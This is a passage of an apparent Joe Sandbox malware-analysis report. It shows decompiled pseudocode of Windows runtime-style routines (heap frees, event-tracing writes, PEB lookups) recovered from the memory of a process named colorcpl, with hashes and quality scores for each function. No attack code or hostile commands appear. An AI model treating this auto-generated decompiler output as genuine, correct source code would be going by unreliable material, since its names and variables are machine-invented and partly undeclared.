                                                                                                					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                                                					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                                                						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                                                					}
                                                                                                					_t10 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                                				}
                                                                                                				return _t10;
                                                                                                			}








                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ebc12dce3b42224456ec01c5721e093de6b7f62ae58a5c65c3705badd1f4ff91
                                                                                                • Instruction ID: 3028157ea6d46c79f868405ddd8816a53dd3423bd6dff3db14ae08967f51ff55
                                                                                                • Opcode Fuzzy Hash: ebc12dce3b42224456ec01c5721e093de6b7f62ae58a5c65c3705badd1f4ff91
                                                                                                • Instruction Fuzzy Hash: 3701DF72641B55BFD6D0AB69CE84E13B7ACFF49660B001225B62883A51DB24EC11CAE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 61%
                                                                                                			E06ED14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				short _v54;
                                                                                                				char _v60;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed char* _t21;
                                                                                                				intOrPtr _t27;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr _t34;
                                                                                                				signed int _t35;
                                                                                                
                                                                                                				_t32 = __edx;
                                                                                                				_t27 = __ebx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t35;
                                                                                                				_t33 = __edx;
                                                                                                				_t34 = __ecx;
                                                                                                				E06E5FA60( &_v60, 0, 0x30);
                                                                                                				_v20 = _a4;
                                                                                                				_v16 = _a8;
                                                                                                				_v28 = _t34;
                                                                                                				_v24 = _t33;
                                                                                                				_v54 = 0x1034;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t21 = 0x7ffe0388;
                                                                                                				} else {
                                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                				}
                                                                                                				_push( &_v60);
                                                                                                				_push(0x10);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t21 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                			}


















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: be76cab25bb7e049b0889229d958b619279a0fc313cc1bd03a9a2db06833bdb1
                                                                                                • Instruction ID: 2eed1bc6ec0d638c68e279eb07244bd9488b6ed5ec046ac9aa95de1936637281
                                                                                                • Opcode Fuzzy Hash: be76cab25bb7e049b0889229d958b619279a0fc313cc1bd03a9a2db06833bdb1
                                                                                                • Instruction Fuzzy Hash: D0018C71A00358AFDB44DFA8D846EAEBBB8EF44710F404066B914EB281DA74DA01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 61%
                                                                                                			E06ED138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				short _v54;
                                                                                                				char _v60;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed char* _t21;
                                                                                                				intOrPtr _t27;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr _t34;
                                                                                                				signed int _t35;
                                                                                                
                                                                                                				_t32 = __edx;
                                                                                                				_t27 = __ebx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t35;
                                                                                                				_t33 = __edx;
                                                                                                				_t34 = __ecx;
                                                                                                				E06E5FA60( &_v60, 0, 0x30);
                                                                                                				_v20 = _a4;
                                                                                                				_v16 = _a8;
                                                                                                				_v28 = _t34;
                                                                                                				_v24 = _t33;
                                                                                                				_v54 = 0x1033;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t21 = 0x7ffe0388;
                                                                                                				} else {
                                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                				}
                                                                                                				_push( &_v60);
                                                                                                				_push(0x10);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t21 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                			}


















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4fb7e2f0249cdcd845ba9be780f00bf559e55303216cd805499438bdb6e826ea
                                                                                                • Instruction ID: 2ee6751e0c6861b2a4d6ddedc5f4399069e8ae2c00c02e202c5a500bbb47b556
                                                                                                • Opcode Fuzzy Hash: 4fb7e2f0249cdcd845ba9be780f00bf559e55303216cd805499438bdb6e826ea
                                                                                                • Instruction Fuzzy Hash: 99019E71E0431CAFDB44DFA8D886EAEBBB8EF44710F014066B914EB281DA70DA01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E06E158EC(intOrPtr __ecx) {
                                                                                                				signed int _v8;
                                                                                                				char _v28;
                                                                                                				char _v44;
                                                                                                				char _v76;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t10;
                                                                                                				intOrPtr _t16;
                                                                                                				intOrPtr _t17;
                                                                                                				intOrPtr _t27;
                                                                                                				intOrPtr _t28;
                                                                                                				signed int _t29;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t29;
                                                                                                				_t10 =  *[fs:0x30];
                                                                                                				_t27 = __ecx;
                                                                                                				if(_t10 == 0) {
                                                                                                					L6:
                                                                                                					_t28 = 0x6df5c80;
                                                                                                				} else {
                                                                                                					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                					if(_t16 == 0) {
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                                                					}
                                                                                                				}
                                                                                                				if(E06E15943() != 0 &&  *0x6f05320 > 5) {
                                                                                                					E06E97B5E( &_v44, _t27);
                                                                                                					_t22 =  &_v28;
                                                                                                					E06E97B5E( &_v28, _t28);
                                                                                                					_t11 = E06E97B9C(0x6f05320, 0x6dfbf15,  &_v28, _t22, 4,  &_v76);
                                                                                                				}
                                                                                                				return E06E5B640(_t11, _t17, _v8 ^ _t29, 0x6dfbf15, _t27, _t28);
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ec9100b97e91302ea8f64b2d90e0b16b6e44276f2146423491d00dfa73bd598f
                                                                                                • Instruction ID: 95803cfd4cd80659452eacc78828bc2497e88cfa1105cf0f488a867ae107cc76
                                                                                                • Opcode Fuzzy Hash: ec9100b97e91302ea8f64b2d90e0b16b6e44276f2146423491d00dfa73bd598f
                                                                                                • Instruction Fuzzy Hash: 8C0142B1A203089BDBC4EB79CC209AE73BEEF84130F45106999229B284EE30DD05D692
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 59%
                                                                                                			E06ECFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				short _v58;
                                                                                                				char _v64;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed char* _t18;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t30;
                                                                                                				intOrPtr _t31;
                                                                                                				signed int _t32;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_t24 = __ebx;
                                                                                                				_v12 =  *0x6f0d360 ^ _t32;
                                                                                                				_t30 = __edx;
                                                                                                				_t31 = __ecx;
                                                                                                				E06E5FA60( &_v64, 0, 0x30);
                                                                                                				_v24 = _a4;
                                                                                                				_v32 = _t31;
                                                                                                				_v28 = _t30;
                                                                                                				_v58 = 0x266;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t18 = 0x7ffe0388;
                                                                                                				} else {
                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                				}
                                                                                                				_push( &_v64);
                                                                                                				_push(0x10);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 014288b2fa8baa3502d7c978cabeb9765e259ad9eedf0c5abbcf7ff168b8b3a5
                                                                                                • Instruction ID: 67a2334da1abb53a2cda63383161cc5cd1c0a80ab43597d9fd688678a487d3f1
                                                                                                • Opcode Fuzzy Hash: 014288b2fa8baa3502d7c978cabeb9765e259ad9eedf0c5abbcf7ff168b8b3a5
                                                                                                • Instruction Fuzzy Hash: AE018471E0035CAFDB54DBA9D845FAEB7BCEF45710F40406AB910AB291DA70DA01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 59%
                                                                                                			E06ECFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				short _v58;
                                                                                                				char _v64;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed char* _t18;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t30;
                                                                                                				intOrPtr _t31;
                                                                                                				signed int _t32;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_t24 = __ebx;
                                                                                                				_v12 =  *0x6f0d360 ^ _t32;
                                                                                                				_t30 = __edx;
                                                                                                				_t31 = __ecx;
                                                                                                				E06E5FA60( &_v64, 0, 0x30);
                                                                                                				_v24 = _a4;
                                                                                                				_v32 = _t31;
                                                                                                				_v28 = _t30;
                                                                                                				_v58 = 0x267;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t18 = 0x7ffe0388;
                                                                                                				} else {
                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                				}
                                                                                                				_push( &_v64);
                                                                                                				_push(0x10);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 18281e2ccb720aba735673be0c4f58b70f6ae5a3427b3a87c65addcb37607eb5
                                                                                                • Instruction ID: c2fb4ac530195ae268b5033e6bb34c76494b2a39b19c1c16f895f50abd5750ae
                                                                                                • Opcode Fuzzy Hash: 18281e2ccb720aba735673be0c4f58b70f6ae5a3427b3a87c65addcb37607eb5
                                                                                                • Instruction Fuzzy Hash: DE018471E0035CAFDB54DFA9D845FAEB7BCEF44710F00406AB910AB281DA70DA01CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06EE1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                                				char _v8;
                                                                                                				void* _v11;
                                                                                                				unsigned int _v12;
                                                                                                				void* _v15;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				char* _t16;
                                                                                                				signed int* _t35;
                                                                                                
                                                                                                				_t22 = __ebx;
                                                                                                				_t35 = __ecx;
                                                                                                				_v8 = __edx;
                                                                                                				_t13 =  !( *__ecx) + 1;
                                                                                                				_v12 =  !( *__ecx) + 1;
                                                                                                				if(_a4 != 0) {
                                                                                                					E06EE165E(__ebx, 0x6f08ae4, (__edx -  *0x6f08b04 >> 0x14) + (__edx -  *0x6f08b04 >> 0x14), __edi, __ecx, (__edx -  *0x6f08b04 >> 0x14) + (__edx -  *0x6f08b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                                				}
                                                                                                				E06EDAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t16 = 0x7ffe0388;
                                                                                                				} else {
                                                                                                					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                				}
                                                                                                				if( *_t16 != 0) {
                                                                                                					_t16 = E06ECFE3F(_t22, _t35, _v8, _v12);
                                                                                                				}
                                                                                                				return _t16;
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3aa9445d4b7f8e5d6ce3eb5a3290f13231a5e632ac94447efb80b451aec87b2
                                                                                                • Instruction ID: 3ee0b93acd32d44cf3b69f29800d9e4105df21198f89eb1501dfb2255e2f2dbb
                                                                                                • Opcode Fuzzy Hash: a3aa9445d4b7f8e5d6ce3eb5a3290f13231a5e632ac94447efb80b451aec87b2
                                                                                                • Instruction Fuzzy Hash: 78014C725047459FCBD0EF68CD04B5A77E9AB84314F049529F89583690EE30D595CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E2B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                                				signed char _t11;
                                                                                                				signed char* _t12;
                                                                                                				intOrPtr _t24;
                                                                                                				signed short* _t25;
                                                                                                
                                                                                                				_t25 = __edx;
                                                                                                				_t24 = __ecx;
                                                                                                				_t11 = ( *[fs:0x30])[0x50];
                                                                                                				if(_t11 != 0) {
                                                                                                					if( *_t11 == 0) {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                					L2:
                                                                                                					if( *_t12 != 0) {
                                                                                                						_t12 =  *[fs:0x30];
                                                                                                						if((_t12[0x240] & 0x00000004) == 0) {
                                                                                                							goto L3;
                                                                                                						}
                                                                                                						if(E06E37D50() == 0) {
                                                                                                							_t12 = 0x7ffe0385;
                                                                                                						} else {
                                                                                                							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                						}
                                                                                                						if(( *_t12 & 0x00000020) == 0) {
                                                                                                							goto L3;
                                                                                                						}
                                                                                                						return E06E97016(_a4, _t24, 0, 0, _t25, 0);
                                                                                                					}
                                                                                                					L3:
                                                                                                					return _t12;
                                                                                                				}
                                                                                                				L1:
                                                                                                				_t12 = 0x7ffe0384;
                                                                                                				goto L2;
                                                                                                			}








                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                • Instruction ID: 92201d0f7e788c02822b91ff4ecba56a38c7cb8b5e41cef936486eeb83fa9d63
                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                • Instruction Fuzzy Hash: A501B131610780DFD762875CC948F6A77EDEB41658F0910A1E915CB651E628DC40C660
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 54%
                                                                                                			E06EE8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				short _v62;
                                                                                                				char _v68;
                                                                                                				signed char* _t29;
                                                                                                				intOrPtr _t35;
                                                                                                				intOrPtr _t41;
                                                                                                				intOrPtr _t42;
                                                                                                				signed int _t43;
                                                                                                
                                                                                                				_t40 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t43;
                                                                                                				_v28 = __ecx;
                                                                                                				_v62 = 0x1c2a;
                                                                                                				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                                                                				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                                                                				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                                                                				_v24 = __edx;
                                                                                                				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t29 = 0x7ffe0386;
                                                                                                				} else {
                                                                                                					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                				}
                                                                                                				_push( &_v68);
                                                                                                				_push(0x1c);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t29 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                                                                			}



















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ee0c176bac40c59f9f4278edf7ff8e251f7e86a96829108bcf437fd7f1b94475
                                                                                                • Instruction ID: 5c20314f13d96f90c20e0e59dde42ae760cbbf3bf94f5d6f4a93fa391cf91197
                                                                                                • Opcode Fuzzy Hash: ee0c176bac40c59f9f4278edf7ff8e251f7e86a96829108bcf437fd7f1b94475
                                                                                                • Instruction Fuzzy Hash: 31111E70E003599FDB44DFA8D841BAEB7F4FF08300F1442AAE918EB382E6349940CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 54%
                                                                                                			E06EE8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				short _v66;
                                                                                                				char _v72;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed char* _t18;
                                                                                                				signed int _t32;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_v12 =  *0x6f0d360 ^ _t32;
                                                                                                				_t31 = _a8;
                                                                                                				_t30 = _a12;
                                                                                                				_v66 = 0x1c20;
                                                                                                				_v40 = __ecx;
                                                                                                				_v36 = __edx;
                                                                                                				_v32 = _a4;
                                                                                                				_v28 = _a8;
                                                                                                				_v24 = _a12;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t18 = 0x7ffe0386;
                                                                                                				} else {
                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                				}
                                                                                                				_push( &_v72);
                                                                                                				_push(0x14);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                			}

















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ee57572ceb91107d256c32d1fee82f18bc70230a3ab878d0687efd8d84df12a
                                                                                                • Instruction ID: 4a0d3cf9ba036bee5fe7ee71649ecc1de1c9775c0bcdb251ba73709b7a5c2f0a
                                                                                                • Opcode Fuzzy Hash: 1ee57572ceb91107d256c32d1fee82f18bc70230a3ab878d0687efd8d84df12a
                                                                                                • Instruction Fuzzy Hash: 9C011AB1A0031CAFDB44DFA9D9419EEB7B8EF48350F10405AF914E7381E634A900CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1DB60(signed int __ecx) {
                                                                                                				intOrPtr* _t9;
                                                                                                				void* _t12;
                                                                                                				void* _t13;
                                                                                                				intOrPtr _t14;
                                                                                                
                                                                                                				_t9 = __ecx;
                                                                                                				_t14 = 0;
                                                                                                				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                                                                					_t13 = 0xc000000d;
                                                                                                				} else {
                                                                                                					_t14 = E06E1DB40();
                                                                                                					if(_t14 == 0) {
                                                                                                						_t13 = 0xc0000017;
                                                                                                					} else {
                                                                                                						_t13 = E06E1E7B0(__ecx, _t12, _t14, 0xfff);
                                                                                                						if(_t13 < 0) {
                                                                                                							L06E1E8B0(__ecx, _t14, 0xfff);
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                                                							_t14 = 0;
                                                                                                						} else {
                                                                                                							_t13 = 0;
                                                                                                							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				 *_t9 = _t14;
                                                                                                				return _t13;
                                                                                                			}








                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                • Instruction ID: 129e4b7c761459d0e8566709ea22bf9c50d250610ab90bc283b9cc31628d7ab8
                                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                • Instruction Fuzzy Hash: F2F0FC736017329FE7B65A558C84FA7B6999FC1A60F151035F5079F348CA608C02E6D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                                                				signed char* _t13;
                                                                                                				intOrPtr _t22;
                                                                                                				char _t23;
                                                                                                
                                                                                                				_t23 = __edx;
                                                                                                				_t22 = __ecx;
                                                                                                				if(E06E37D50() != 0) {
                                                                                                					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                				} else {
                                                                                                					_t13 = 0x7ffe0384;
                                                                                                				}
                                                                                                				if( *_t13 != 0) {
                                                                                                					_t13 =  *[fs:0x30];
                                                                                                					if((_t13[0x240] & 0x00000004) == 0) {
                                                                                                						goto L3;
                                                                                                					}
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t13 = 0x7ffe0385;
                                                                                                					} else {
                                                                                                						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                					}
                                                                                                					if(( *_t13 & 0x00000020) == 0) {
                                                                                                						goto L3;
                                                                                                					}
                                                                                                					return E06E97016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                                                				} else {
                                                                                                					L3:
                                                                                                					return _t13;
                                                                                                				}
                                                                                                			}







                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
